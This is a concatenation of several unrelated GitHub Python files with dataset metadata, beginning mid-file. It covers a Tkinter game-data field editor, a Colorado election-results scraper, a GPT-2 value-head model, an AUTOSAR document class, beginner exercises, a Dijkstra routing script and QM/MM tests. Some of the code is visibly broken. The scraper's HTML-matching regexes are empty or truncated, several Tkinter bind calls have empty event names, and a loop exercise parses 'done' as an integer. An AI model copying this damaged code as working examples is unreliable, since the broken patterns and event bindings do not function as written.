[1, 2, 3, ...]\"\n )\n return new_value\n\n @property\n def string_conversion_method(self) -> tp.Callable:\n \"\"\"Returns the appropriate update method for the current field type.\"\"\"\n\n # First, look for a method defined for this specific type.\n try:\n field_type_name = self.field_type.__name__\n except AttributeError:\n raise AttributeError(f\"Could not detect name of field type {self.field_type}.\")\n try:\n return getattr(self, f\"_string_to_{field_type_name}\")\n except AttributeError:\n pass\n\n # Try a super-type method.\n if issubclass(self.field_type, str):\n return lambda value: value\n if issubclass(self.field_type, GameObjectSequence):\n return self._string_to_GameObjectSequence\n if issubclass(self.field_type, BaseGameObject):\n return self._string_to_GameObject\n if issubclass(self.field_type, IntEnum):\n raise NotImplementedError\n\n raise AttributeError(f\"Could not find field update method '_string_to_{field_type_name}' or a superclass.\")\n\n def update_field_value_display(self, new_value):\n \"\"\"Updates field value and display/option properties related to it.\"\"\"\n self.field_update_method(new_value)\n self._set_field_fg(new_value)\n self.link_missing = self.field_links and not any(link.name for link in self.field_links)\n self.build_field_context_menu()\n\n @property\n def active(self):\n return self._active\n\n @active.setter\n def active(self, value: bool):\n if not self._active and value:\n self._active = True\n elif self._active and not value:\n self._active = False\n else:\n return # No change to active state.\n\n # All widget backgrounds need updating (except Combobox).\n self._update_colors()\n\n @property\n def link_missing(self):\n return self._link_missing\n\n @link_missing.setter\n def link_missing(self, value: bool):\n if value and not self._link_missing:\n self._link_missing = True\n self._update_colors()\n elif not value and self._link_missing:\n self._link_missing = False\n self._update_colors()\n\n def _update_colors(self):\n bg_color = self._get_color()\n for widget in (\n self.row_box,\n self.field_name_box,\n self.field_name_label,\n self.value_box,\n self.value_label,\n self.value_checkbutton,\n ):\n widget[\"bg\"] = bg_color\n\n def _get_color(self):\n \"\"\"Inspects field name/data and returns an RGB string.\"\"\"\n base_bg = int(self.STYLE_DEFAULTS[\"bg\"].lstrip(\"#\")) # dark grey\n if self.link_missing:\n base_bg += 100\n if self._active:\n base_bg += 123\n if self.row_index % 2:\n base_bg += 111\n return f\"#{base_bg}\"\n\n def _set_custom_intenum_value(self):\n new_value = NumberEditBox(\n self.master, window_title=f\"New value for {self.field_nickname}\", integers_only=True,\n ).go()\n if new_value is None:\n return\n field_changed = self.master.change_field_value(self.field_name, new_value)\n if field_changed:\n self.update_field_value_display(new_value)\n\n def _is_default(self, field_type, value, field_nickname=\"\"):\n return False\n\n\nclass BaseFieldEditor(BaseEditor, abc.ABC):\n FIELD_CANVAS_BG = \"#1d1d1d\"\n FIELD_BOX_WIDTH = 450\n FIELD_BOX_HEIGHT = 400\n FIELD_ROW_HEIGHT = 30\n FIELD_NAME_WIDTH = 30\n FIELD_VALUE_BOX_WIDTH = 200\n FIELD_VALUE_WIDTH = 50\n FIELD_ROW_COUNT = 0 # must be set in child\n FIELD_NAME_FG = \"#DDE\"\n FIELD_NAME_FG_DEFAULT = \"#777\"\n FIELD_VALUE_FG = \"#FFF\"\n FIELD_VALUE_FG_DEFAULT = \"#777\"\n\n FIELD_ROW_CLASS = FieldRow\n field_rows: list[FieldRow]\n\n def __init__(\n self,\n project: GameDirectoryProject,\n linker: WindowLinker,\n master=None,\n toplevel=False,\n window_title=\"Soulstruct 
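The color arithmetic in _get_color above works because a three-digit shorthand color such as "#122" parses as the decimal integer 122, so each additive offset bumps the R, G and B digits together; assuming that base value:

    base_bg = int("#122".lstrip("#"))   # 122 -- decimal, not hex
    print(f"#{base_bg + 111}")          # "#233": the alternate-row tint
    print(f"#{base_bg + 111 + 123}")    # "#356": alternate row + active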
Editor\",\n ):\n if self.FIELD_ROW_COUNT == 0:\n raise AttributeError(\"Class attribute `FIELD_ROW_COUNT` must be set by child of SoulstructBaseFieldEditor.\")\n self.show_hidden_fields = None\n self.field_canvas = None\n self.field_i_frame = None\n self.e_field_value_edit = None\n self.selected_field_row_index = None\n self.displayed_field_count = 0\n self.field_rows = []\n super().__init__(project=project, linker=linker, master=master, toplevel=toplevel, window_title=window_title)\n\n def build(self):\n \"\"\"Builds category, entry, and field tables.\"\"\"\n with self.set_master(sticky=\"nsew\", row_weights=[1], column_weights=[0, 1], auto_columns=0):\n self.build_category_canvas()\n with self.set_master(sticky=\"nsew\", row_weights=[0, 1, 0], column_weights=[1, 1]):\n self.build_previous_range_button(row=0, column=0)\n self.build_hidden_fields_checkbutton(row=0, column=1)\n with self.set_master(sticky=\"nsew\", row=1, column=0, row_weights=[1], column_weights=[1]):\n self.build_entry_frame()\n with self.set_master(sticky=\"nsew\", row=1, column=1, row_weights=[1], column_weights=[1]):\n self.build_field_frame()\n self.build_next_range_button(row=2, column=0)\n\n def build_hidden_fields_checkbutton(self, **kwargs):\n self.show_hidden_fields = self.Checkbutton(\n label=\"Show hidden fields\",\n initial_state=False,\n command=lambda: self.refresh_fields(reset_display=True),\n pady=10,\n **kwargs,\n ).var\n\n def build_field_frame(self):\n self.field_canvas = self.Canvas(\n yscrollincrement=self.FIELD_ROW_HEIGHT,\n vertical_scrollbar=True,\n horizontal_scrollbar=True,\n borderwidth=10,\n highlightthickness=0,\n bg=self.FIELD_CANVAS_BG,\n sticky=\"nsew\",\n row_weights=[1],\n column_weights=[1],\n )\n self.field_i_frame = self.Frame(frame=self.field_canvas, width=self.FIELD_BOX_WIDTH, sticky=\"nsew\")\n self.field_i_frame.bind(\"\", lambda e, c=self.field_canvas: self.reset_canvas_scroll_region(c))\n self.field_canvas.create_window(0, 0, window=self.field_i_frame, anchor=\"nw\")\n\n with self.set_master(self.field_i_frame):\n for row in range(self.FIELD_ROW_COUNT):\n self.field_rows.append(\n self.FIELD_ROW_CLASS(\n self,\n row_index=row,\n main_bindings={\n \"\": lambda _, i=row: self.select_displayed_field_row(i),\n \"\": lambda e, i=row: self._right_click_field(e, i),\n \"\": self._field_press_up,\n \"\": self._field_press_down,\n },\n )\n )\n\n def select_category(\n self, selected_category: tp.Optional[str], first_display_index=0, auto_scroll=False, view_change=False\n ):\n \"\"\"Updates `active_category` attribute and row colors.\n\n By default, resets `first_display_index` to zero.\n Supports 'selected_category=None' to deselect all categories.\n \"\"\"\n old_category = self.active_category\n\n if old_category is not None:\n selected_entry_id = self.get_entry_id(self.active_row_index) if self.active_row_index else None\n self.remembered_ids[old_category] = selected_entry_id\n\n if selected_category != self.active_category:\n self.active_category = selected_category\n for category, (box, label) in self.category_boxes.items():\n if selected_category == category:\n box[\"bg\"] = self.CATEGORY_SELECTED_BG\n label[\"bg\"] = self.CATEGORY_SELECTED_BG\n label.focus_set()\n else:\n box[\"bg\"] = self.CATEGORY_UNSELECTED_BG\n label[\"bg\"] = self.CATEGORY_UNSELECTED_BG\n\n if auto_scroll:\n view_ratio = list(self.category_boxes).index(self.active_category) / (len(self.category_boxes) + 1)\n self.category_canvas.yview_moveto(view_ratio)\n\n self.first_display_index = first_display_index\n 
self.select_entry_row_index(None, edit_if_already_selected=False)\n self.refresh_entries(reset_field_display=True) # TODO: this argument is the only difference. Better way?\n last_selected_entry_id = self.remembered_ids.get(self.active_category, None)\n if last_selected_entry_id is not None:\n try:\n self.select_entry_id(last_selected_entry_id, edit_if_already_selected=False)\n except ValueError:\n self.remembered_ids.pop(self.active_category) # entry ID is invalid\n self.entry_canvas.yview_moveto(0)\n else:\n # Leave no entry selected.\n self.entry_canvas.yview_moveto(0)\n\n if view_change and old_category is not None:\n self.view_history.record_view_change(\n back=lambda: self.select_category(old_category), forward=lambda: self.select_category(selected_category)\n )\n\n def refresh_entries(self, reset_field_display=False):\n super().refresh_entries()\n self.refresh_fields(reset_display=reset_field_display)\n\n def select_entry_row_index(\n self, row_index, set_focus_to_text=True, edit_if_already_selected=True, id_clicked=False, view_change=False\n ):\n super().select_entry_row_index(\n row_index,\n set_focus_to_text=set_focus_to_text,\n edit_if_already_selected=edit_if_already_selected,\n id_clicked=id_clicked,\n view_change=view_change,\n )\n self.refresh_fields()\n\n # `refresh_fields()` seems to steal focus aggressively, so end by setting it back to entry name.\n if row_index is not None and set_focus_to_text:\n self.entry_rows[row_index].text_label.focus_set()\n\n def refresh_fields(self, reset_display=False):\n \"\"\"Refresh all field information.\"\"\"\n field_dict = self.get_selected_field_dict()\n\n self._cancel_field_value_edit()\n\n show_hidden_fields = self.show_hidden_fields.get()\n\n row = 0\n for field_name in self.get_field_names(field_dict):\n\n try:\n field_nickname, is_main, field_type, field_doc = self.get_field_display_info(field_dict, field_name)\n except ValueError as e:\n raise ValueError(f\"Could not get field information for field {field_name}. Error: {str(e)}\")\n\n if isinstance(field_type, str) and (\"
    \n # \n # \n # \n # \n digits = r'(\\d{1,3}(,\\d{1,3})?)'\n pat = r'^$'.format(col_title=col_title, digits=digits)\n matches = re.match(pat, line)\n if matches:\n # Totals may have commas for thousands separator\n total = locale.atoi(matches.groups()[0])\n return total\n else:\n return None\n\n\ndef process_election_file(htmlfile, csvfile):\n fields = {'district': 0, 'counties': '', 'registered_voters': 0, 'ballots_cast': 0,\n 'democrat': 0, 'republican': 0, 'other': 0, 'total': 0, 'dem_winner': 0, 'rep_winner': 0,\n 'landslide_d': 0, 'landslide_r': 0}\n with open(htmlfile, 'r') as fp1, open(csvfile, 'w') as fp2:\n csvwriter = csv.DictWriter(fp2, fieldnames=fields.keys())\n csvwriter.writeheader()\n county_list = []\n total_found = False\n # print(\"district,counties,registered_voters,ballots_cast,democrat,republican,other,total,dem_winner,rep_winner,landslide_d, landslide_r\")\n\n for line in fp1.readlines():\n # District heading\n matches = re.match(r'^

(?:State Senate - )?District (\d+)$', line)\n            if not matches:\n                # Try 2014 pattern:\n                matches = re.match(r'^District (\d+)
    $', line)\n if matches:\n fields['district'] = int(matches.groups()[0])\n county_list = []\n continue\n\n # Total\n # \n matches = re.match(r'', line)\n if not matches:\n # Special case for 2012 District 13: \n # Also special case for 2014 District 47 and District 60 with HTML formatting inconsistency\n matches = re.match(r'', line)\n if matches:\n if matches.groups()[0] == 'Total':\n total_found = True\n else:\n county_list.append(matches.groups()[0])\n continue\n\n if not total_found:\n continue\n\n # Fix-up errors in HTML file\n if fields['district'] == 33 and 'Broomfield' in county_list and line == '\\n':\n # 2018 - District 33 - Broomfield\n line = '\\n'\n elif fields['district'] == 46 and 'Pueblo' in county_list and line == '\\n':\n # 2018 - Distict 46 - Pueblo\n line = '\\n'\n\n # Registered voters\n total = total_matcher(line, \"Registered voters\")\n if total and total_found:\n fields['registered_voters'] = total\n continue\n\n # Ballots cast\n total = total_matcher(line, \"Ballots cast\")\n if total:\n fields['ballots_cast'] = total\n continue\n\n # Other\n total = total_matcher(line, r'(?:.+)\\((?!(?:DEM|REP))\\w+\\)')\n if total:\n fields['other'] += total # Sum\n continue\n\n # 2014 write-in for District 60\n total = total_matcher(line, r'(?:.+)\\(UNA\\)(?: \\(Write-In\\))?')\n if total:\n fields['other'] += total # Sum because of write-in UNA\n continue\n\n # Democrat\n total = total_matcher(line, r'(?:.+)\\(DEM\\)(?: \\(Write-In\\))?')\n if total:\n fields['democrat'] += total # Sum because of write-in Democrat\n continue\n\n # Republican\n total = total_matcher(line, r'(?:.+)\\(REP\\)(?: \\(Write-In\\))?')\n if total:\n fields['republican'] += total # Sum because of write-in Republicans\n continue\n\n # Total\n total = total_matcher(line, \"Total\")\n if total:\n fields['total'] = total\n\n # Determine party that prevailed\n if fields['democrat'] > fields['republican'] and fields['democrat'] > fields['other']:\n fields['dem_winner'] = 1\n fields['rep_winner'] = 0\n elif fields['republican'] > fields['democrat'] and fields['republican'] > fields['other']:\n fields['dem_winner'] = 0\n fields['rep_winner'] = 1\n else:\n raise Exception(\"Election tie or other won!\")\n\n # Is this a landslide district?\n landslide_percentage = 0.6 # 60%\n if fields['dem_winner'] == 1:\n fields['landslide_d'] = int(fields['democrat'] / fields['total'] >= landslide_percentage)\n fields['landslide_r'] = 0\n elif fields['rep_winner']:\n fields['landslide_r'] = int(fields['republican'] / fields['total'] >= landslide_percentage)\n fields['landslide_d'] = 0\n else:\n raise Exception(\"No winner found!\")\n\n # Sanity check\n party_total = fields['democrat'] + fields['republican'] + fields['other']\n if party_total != fields['total']:\n raise Exception(f\"Total mismatch for district {fields['district']}: computed {party_total} != SOS {fields['total']}\")\n\n # Flatten county list\n fields['counties'] = ' - '.join(county_list)\n\n # Emit CSV row\n csvwriter.writerow(fields)\n\n # Reset totals\n fields['democrat'] = 0\n fields['republican'] = 0\n fields['other'] = 0\n total_found = False\n\n\nif __name__ == \"__main__\":\n locale.setlocale(locale.LC_ALL, 'en_US.UTF-8') # For parsing numbers with comma separators\n years = [2018, 2016, 2014, 2012]\n district_types = ['representatives', 'senate']\n for year in years:\n for district_type in district_types:\n if year == 2018 or year == 2016:\n # https://www.sos.state.co.us/pubs/elections/Results/Abstract/2018/general/stateRepresentatives.html\n # 
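total_matcher above leans on locale.atoi so that comma-grouped vote totals parse as integers; a one-line check:

    import locale

    locale.setlocale(locale.LC_ALL, 'en_US.UTF-8')
    print(locale.atoi('1,234,567'))   # -> 1234567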
https://www.sos.state.co.us/pubs/elections/Results/Abstract/2016/general/stateRepresentatives.html\n htmlfile = './sos_files/state{district_type}.{year}.html'.format(district_type=district_type.title(), year=year)\n elif year == 2014 or year == 2012:\n # https://www.sos.state.co.us/pubs/elections/Results/Abstract/2014/general/representatives.html\n # https://www.sos.state.co.us/pubs/elections/Results/Abstract/2012/general/representatives.html\n htmlfile = './sos_files/{district_type}.{year}.html'.format(district_type=district_type, year=year)\n else:\n raise Exception(f\"Invalid year: {year}\")\n csvfile = './election_data/{year}/state{district_type}.{year}.csv'.format(district_type=district_type.title(), year=year)\n print(f\"Processing {htmlfile}\")\n process_election_file(htmlfile, csvfile)\n print(f\"CSV written to {csvfile}\")\n","repo_name":"coloradocarlos/colorado_redistricting_2021","sub_path":"sos_screen_scraper.py","file_name":"sos_screen_scraper.py","file_ext":"py","file_size_in_byte":8799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20109587721","text":"from transformers import GPT2LMHeadModel, GPT2Tokenizer, GPT2Model, GPT2PreTrainedModel\nfrom transformers.modeling_utils import top_k_top_p_filtering\nfrom torch import nn\nfrom torch.nn import Identity\nimport torch.nn.functional as F\nimport torch\nimport numpy as np\n\nclass ValueHead(nn.Module):\n \"\"\"The ValueHead class implements a head for GPT2 that returns a scalar for each output token.\"\"\"\n def __init__(self, config):\n super().__init__()\n self.detach_head = False\n self.summary_type = config.summary_type if hasattr(config, \"summary_type\") else \"last\"\n if self.summary_type == \"attn\":\n raise NotImplementedError\n self.summary = Identity()\n if hasattr(config, \"summary_use_proj\") and config.summary_use_proj:\n if hasattr(config, \"summary_proj_to_labels\") and config.summary_proj_to_labels and config.num_labels > 0:\n num_classes = config.num_labels\n else:\n num_classes = config.hidden_size\n self.summary = nn.Linear(config.hidden_size, num_classes)\n self.activation = Identity()\n if hasattr(config, \"summary_activation\") and config.summary_activation == \"tanh\":\n self.activation = nn.Tanh()\n self.first_dropout = Identity()\n if hasattr(config, \"summary_first_dropout\") and config.summary_first_dropout > 0:\n self.first_dropout = nn.Dropout(config.summary_first_dropout)\n self.last_dropout = Identity()\n if hasattr(config, \"summary_last_dropout\") and config.summary_last_dropout > 0:\n self.last_dropout = nn.Dropout(config.summary_last_dropout)\n self.flatten = nn.Flatten()\n\n def forward(self, hidden_states, cls_index=None):\n if self.detach_head:\n output = hidden_states.detach()\n else:\n output = hidden_states\n output = self.first_dropout(output)\n output = self.summary(output)\n output = self.activation(output)\n output = self.last_dropout(output)\n\n return output\n\n\nclass GPT2HeadWithValueModel(GPT2PreTrainedModel):\n \"\"\"The GPT2HeadWithValueModel class implements a GPT2 language model with a secondary, scalar head.\"\"\"\n def __init__(self, config):\n super().__init__(config)\n print(config)\n print('vocab_size shape :',config.vocab_size)\n config.num_labels = 1\n self.transformer = GPT2Model(config)\n self.lm_head = nn.Linear(config.n_embd, config.vocab_size, bias=False)\n self.v_head = ValueHead(config)\n self.init_weights()\n\n def get_output_embeddings(self):\n return self.lm_head\n\n def 
detach_value_head(self):\n self.v_head.detach_head = True\n\n def forward(\n self,\n input_ids=None,\n past=None,\n attention_mask=None,\n token_type_ids=None,\n position_ids=None,\n head_mask=None,\n inputs_embeds=None,\n mc_token_ids=None,\n lm_labels=None,\n mc_labels=None,\n ):\n transformer_outputs = self.transformer(\n input_ids,\n past=past,\n attention_mask=attention_mask,\n token_type_ids=token_type_ids,\n position_ids=position_ids,\n head_mask=head_mask,\n inputs_embeds=inputs_embeds,\n )\n hidden_states = transformer_outputs[0]\n\n lm_logits = self.lm_head(hidden_states)\n value = self.v_head(hidden_states).squeeze(-1)\n\n outputs = (lm_logits,) + transformer_outputs[1:] + (value,)\n\n return outputs\n\n\n\ndef respond_to_batch(model, ref_model , queries, txt_len=20, top_k=0, top_p=1.0):\n \"\"\"Sample text from language model.\"\"\"\n input_ids = queries\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n with torch.no_grad(): \n for i in range(txt_len):\n outputs = model(input_ids)\n next_token_logits = outputs[0][:, -1, :]\n next_token_logits = top_k_top_p_filtering(next_token_logits, top_k=top_k, top_p=top_p)\n if ref_model is not None:\n ref_next_token_logits = ref_model(input_ids)[0][:, -1, :]\n ref_next_token_probs = ref_next_token_logits.softmax(dim=-1)\n next_token_logits[ref_next_token_probs < 0.01] = np.NINF#-inf\n probs = F.softmax(next_token_logits, dim=-1)\n next_token = torch.multinomial(probs, num_samples=1).squeeze(1)\n input_ids = torch.cat([input_ids, next_token.unsqueeze(-1)], dim=-1)\n return input_ids[:, -txt_len:]\n\n\n","repo_name":"HongliangLiang/gptfuzzer","sub_path":"Inference/gpt2.py","file_name":"gpt2.py","file_ext":"py","file_size_in_byte":4542,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"26894938239","text":"\n\"\"\"\nAUTOSAR Document\n\"\"\"\n\nfrom typing import Any\nimport autosar.xml.element as ar_element\n\n\nclass DocumentMeta:\n \"\"\"\n Helper class for holding information about XML schema\n \"\"\"\n\n def __init__(self, schema_version: int) -> None:\n self.schema_version = schema_version\n\n @property\n def schema_file(self) -> str:\n \"\"\"\n Converts schema version integer to expected schema file name\n \"\"\"\n return f'AUTOSAR_{self.schema_version:05d}.xsd'\n\n\nclass Document(DocumentMeta):\n \"\"\"\n Implements AUTOSAR root description element\n \"\"\"\n\n def __init__(self, packages: list[ar_element.Package] | None = None, schema_version=51) -> None:\n super().__init__(schema_version)\n self.file_info_comment = None # .FILE-INFO-COMMENT\n self.admin_data = None # .ADMIN-DATA\n self.introduction = None # .INTRODUCTION\n self.packages = [] # .PACKAGES\n self._package_map = {} # internal package map\n if packages is not None:\n for package in packages:\n self.append(package)\n\n def append(self, package: ar_element.Package):\n \"\"\"\n Appends package to this document and\n appropriately updates reference links\n \"\"\"\n if isinstance(package, ar_element.Package):\n if package.name in self._package_map:\n raise ValueError(\n f\"Package with SHORT-NAME '{package.name}' already exists\")\n package.parent = self\n self.packages.append(package)\n self._package_map[package.name] = package\n\n def find(self, ref: str) -> Any:\n \"\"\"\n Finds item by reference\n \"\"\"\n if ref.startswith('/'):\n ref = ref[1:]\n parts = ref.partition('/')\n package = self._package_map.get(parts[0], None)\n if (package is not None) and (len(parts[2]) > 0):\n return 
package.find(parts[2])\n return package\n\n def update_ref_parts(self, ref_parts: list[str]):\n \"\"\"\n Utility method used generating XML references\n \"\"\"\n ref_parts.append('')\n","repo_name":"cogu/autosar","sub_path":"src/autosar/xml/document.py","file_name":"document.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","stars":291,"dataset":"github-code","pt":"37"} +{"seq_id":"10448646765","text":"# Loops & Iterators\n#program for calc. count and avg of input values\ncount = 0\nsum = 0\ntry:\n while True:\n num = input(\"Enter a number: \")\n if num == \"done\":\n break\n sum += int(num)\n count += 1\n print(count,sum,sum/count)\nexcept ValueError : \n print('invalid entry')\n\n#program for largest and smallest values\nnumbers = []\ntry:\n while True:\n num = input('Enter the number:')\n numbers.append(int(num))\n if num == \"done\":\n break\nexcept ValueError:\n print(\"Process ended\")\nprint(numbers)\nnumbers.sort()\nprint(numbers)\nprint(f'largest number is {numbers[-1]}')\nprint(f'smallest number is {numbers[0]}')\n\n","repo_name":"revacprogramming/python01-ahp2808","sub_path":"ActivitySet01/problem06.py","file_name":"problem06.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37604073024","text":"import sys\n\nh=45\npriority={'Высокий':0.74, 'Средний':1, 'Низкий':1.25}\n\nclass Graph(object):\n def __init__(self, nodes, init_graph):\n self.nodes = nodes\n self.graph = self.construct_graph(nodes, init_graph)\n\n def construct_graph(self, nodes, init_graph):\n '''\n Этот метод обеспечивает симметричность графика. Другими словами, если существует путь от узла A к B со значением V, должен быть путь от узла B к узлу A со значением V.\n '''\n graph = {}\n for node in nodes:\n graph[node] = {}\n\n graph.update(init_graph)\n\n for node, edges in graph.items():\n for adjacent_node, value in edges.items():\n if graph[adjacent_node].get(node, False) == False:\n graph[adjacent_node][node] = value\n\n return graph\n\n def get_nodes(self):\n \"Возвращает узлы графа\"\n return self.nodes\n\n def get_outgoing_edges(self, node):\n \"Возвращает соседей узла\"\n connections = []\n for out_node in self.nodes:\n if self.graph[node].get(out_node, False) != False:\n connections.append(out_node)\n return connections\n\n def value(self, node1, node2):\n \"Возвращает значение ребра между двумя узлами\"\n return self.graph[node1][node2]\n\n\ndef dijkstra_algorithm(graph, start_node):\n unvisited_nodes = list(graph.get_nodes())\n\n # посещении каждого узла и обновлять его по мере продвижения по графику\n shortest_path = {}\n\n # dict, чтобы сохранить кратчайший известный путь к найденному узлу\n previous_nodes = {}\n\n # max_value для инициализации значения \"бесконечности\" непосещенных узлов\n max_value = sys.maxsize\n for node in unvisited_nodes:\n shortest_path[node] = max_value\n # инициализируем значение начального узла 0\n shortest_path[start_node] = 0\n\n # алгоритм выполняется до тех пор, пока мы не посетим все узлы\n while unvisited_nodes:\n # узел с наименьшей оценкой\n current_min_node = None\n for node in unvisited_nodes: # Iterate over the nodes\n if current_min_node == None:\n current_min_node = node\n elif shortest_path[node] < shortest_path[current_min_node]:\n current_min_node = node\n\n #соседей текущего узла и обновляет их расстояния\n neighbors = graph.get_outgoing_edges(current_min_node)\n for neighbor in neighbors:\n tentative_value 
= shortest_path[current_min_node] + graph.value(current_min_node, neighbor)\n            if tentative_value < shortest_path[neighbor]:\n                shortest_path[neighbor] = tentative_value\n                previous_nodes[neighbor] = current_min_node\n\n        unvisited_nodes.remove(current_min_node)\n\n    return previous_nodes, shortest_path\n\n\ndef print_result(previous_nodes, shortest_path, start_node, target_node):\n    path = []\n    node = target_node\n    while node != start_node:\n        path.append(node)\n        node = previous_nodes[node]\n    path.append(start_node)\n    print(\"We found the following best path with a value of {}.\".format(shortest_path[target_node]))\n    print(\" -> \".join(reversed(path)))\n\nsort_list=[]\n\nnodes = ['ул. им. 40-летия Победы, д. 20/1', 'ул. им. Атарбекова, д. 24','ул. им. Героя Аверкиева А.А., д. 8',\n'ул. им. Героя Аверкиева А.А., д. 8/1 к. мая, кв. 268','ул. им. Тургенева, д. 106','ул. Красных Партизан, д. 117','ул. Северная, д. 389',\n'ул. Уральская, д. 166/3','ул. Северная, д. 524','ул. им. Кирилла Россинского, д. 61/1', 'ул. Коммунаров, д. 258',\n'ул. им. Дзержинского, д. 100','ул. Северная, д. 326','ул. им. 40-летия Победы, д. 34',\n'ул. Красная, д. 176','ул. Уральская, д. 79/1','ул. Северная, д. 326','ул. Красная, д. 149', 'ул. Целиноградская, д. 6/1',\n'ул. им. Дзержинского, д. 100','ул. Российская, д. 418',\"ул. им. Володи Головатого, д. 313\",'ул. Красная, д. 145']\nsort_list=nodes\n'''''''''\nstaff_point=[] #i-ого сотрудника\nsort_list=nodes#отсортированные по важности и условиям задачи\nnodes=staff_point.append(sort_list) #точки сотрудников\n\n\n\n\n'''''''''''\ninit_graph = {}#получаем хуй за щеку с апи\nfor node in nodes:\n    init_graph[node] = {}\n\ninit_graph[\"ул. им. 40-летия Победы, д. 20/1\"][\"ул. им. Атарбекова, д. 24\"] = 0.5#*priority.values #путь* коэффициент важности (мб + время выполнения)\ninit_graph[\"ул. им. 40-летия Победы, д. 20/1\"][\"ул. им. Героя Аверкиева А.А., д. 8\"] = 1.5#*priority.values\ninit_graph['ул. им. Героя Аверкиева А.А., д. 8'][\"ул. им. Атарбекова, д. 24\"] = 1#*priority.values\ninit_graph['ул. им. Героя Аверкиева А.А., д. 8'][\"ул. Северная, д. 326\"] = 3#*priority.values\ninit_graph[\"ул. им. Атарбекова, д. 24\"][\"ул. Северная, д. 326\"] = 5#*priority.values\ninit_graph[\"ул. Северная, д. 326\"][\"ул. Российская, д. 418\"] = 4#*priority.values\ninit_graph[\"ул. Северная, д. 326\"][\"ул. Уральская, д. 79/1\"] = 1#*priority.values\ninit_graph[\"ул. Красная, д. 176\"][\"ул. Северная, д. 326\"] = 2#*priority.values\ninit_graph[\"ул. Красная, д. 176\"][\"ул. Красная, д. 145\"] = 2#*priority.values\n\ngraph = Graph(nodes, init_graph)\n\nprevious_nodes, shortest_path = dijkstra_algorithm(graph=graph, start_node=\"ул. им. 40-летия Победы, д. 20/1\")\n\nprint_result(previous_nodes, shortest_path, start_node=\"ул. им. 40-летия Победы, д. 20/1\", target_node=\"ул. Красная, д. 
145\")\n#о мб добавить веса в путь\n","repo_name":"pickleCucumber/hakaton_sketch","sub_path":"reserve.py","file_name":"reserve.py","file_ext":"py","file_size_in_byte":7114,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4684961311","text":"from google.colab import files\nuploaded = files.upload()\nimport io\ndf2 = pd.read_csv(io.BytesIO(uploaded['NumberData.csv']))\n# Dataset is now stored in a Pandas Dataframe\nfeat = ['X1','X2', 'X3','X4', 'X5','X6','X7','X8','X9']\nX = df2[feat]\nlabel = ['Y']\ny = df2[label]\n\nX_train, X_test, y_train, y_test = X[:250], X[250:], y[:250], y[250:]\n\nfrom sklearn import linear_model\nclf = linear_model.SGDClassifier(max_iter=1000, tol=1e-3)\n\nclf.fit(X_train, y_train)\n\nclf.predict(X_test.iloc[[5]])\ny_test.iloc[[5]]\n","repo_name":"dipak140/Ordinal-Number-","sub_path":"Code.py","file_name":"Code.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41401478936","text":"from janus import qm_wrapper, mm_wrapper, qmmm, system\nimport numpy as np\nimport pytest\nimport os\n\nwater = os.path.join(str('tests/files/test_openmm/water.pdb'))\nala = os.path.join(str('tests/files/test_openmm/ala_ala_ala.pdb'))\n\npsi4 = qm_wrapper.Psi4Wrapper()\npsi4_ala = qm_wrapper.Psi4Wrapper(charge=1)\n\nom_m = mm_wrapper.OpenMMWrapper(sys_info=water,**{'md_ensemble':'NVT', 'return_info':[]})\nom_m.initialize('Mechanical')\nmain_info_m = om_m.get_main_info()\n\nom_e = mm_wrapper.OpenMMWrapper(sys_info=water,**{'md_ensemble':'NVT', 'return_info':[]})\nom_e.initialize('Electrostatic')\nmain_info_e = om_e.get_main_info()\n\nom_ala = mm_wrapper.OpenMMWrapper(sys_info=ala, **{'md_ensemble':'NVT', 'return_info':[]})\nom_ala.initialize('Electrostatic')\nmain_info_ala = om_ala.get_main_info()\n\nmech = qmmm.QMMM(psi4, om_m,sys_info=water, qm_atoms=[0,1,2], embedding_method='Mechanical' )\nelec = qmmm.QMMM(psi4, om_m,sys_info=water, qm_atoms=[0,1,2], embedding_method='Electrostatic' )\nala_link = qmmm.QMMM(psi4_ala, om_ala,sys_info=ala, qm_atoms=[i for i in range(12)], embedding_method='Electrostatic' )\nala_RC = qmmm.QMMM(psi4_ala, om_ala,sys_info=ala, qm_atoms=[i for i in range(12)], embedding_method='Electrostatic', boundary_treatment='RC' )\nala_RCD = qmmm.QMMM(psi4_ala, om_ala,sys_info=ala, qm_atoms=[i for i in range(12)], embedding_method='Electrostatic', boundary_treatment='RCD')\n\nsys_mech = system.System([0,1,2], [0], 0)\nsys_elec = system.System([0,1,2], [0], 0)\nsys_ala_link = system.System([0,1,2,3],[0], 0)\nsys_ala_RC = system.System([0,1,2,3,4,5], [0,1], 0)\nsys_ala_RCD = system.System([0], [0], 0)\n\nsys_mech.entire_sys = main_info_m\nsys_elec.entire_sys = main_info_e\nsys_ala_link.entire_sys = main_info_ala\nsys_ala_RC.entire_sys = main_info_ala\nsys_ala_RCD.entire_sys = main_info_ala\n\ndef test_find_boundary_bonds():\n\n ala_link.find_boundary_bonds(qm_atoms=[0,1,2,3])\n ala_RC.find_boundary_bonds(qm_atoms=[0,1,2,3,4,5])\n ala_RCD.find_boundary_bonds(qm_atoms=[0])\n\n assert len(ala_link.qmmm_boundary_bonds) == 1 \n assert len(ala_RC.qmmm_boundary_bonds) == 2\n assert len(ala_RCD.qmmm_boundary_bonds) == 4\n\ndef test_prepare_link_atom():\n\n ala_link.prepare_link_atom()\n ala_RC.prepare_link_atom()\n ala_RCD.prepare_link_atom()\n\n assert len(ala_link.link_atoms['all_outer_bonds']) == 0\n assert ala_link.link_atoms[0]['link_atom'] == 'H'\n assert 
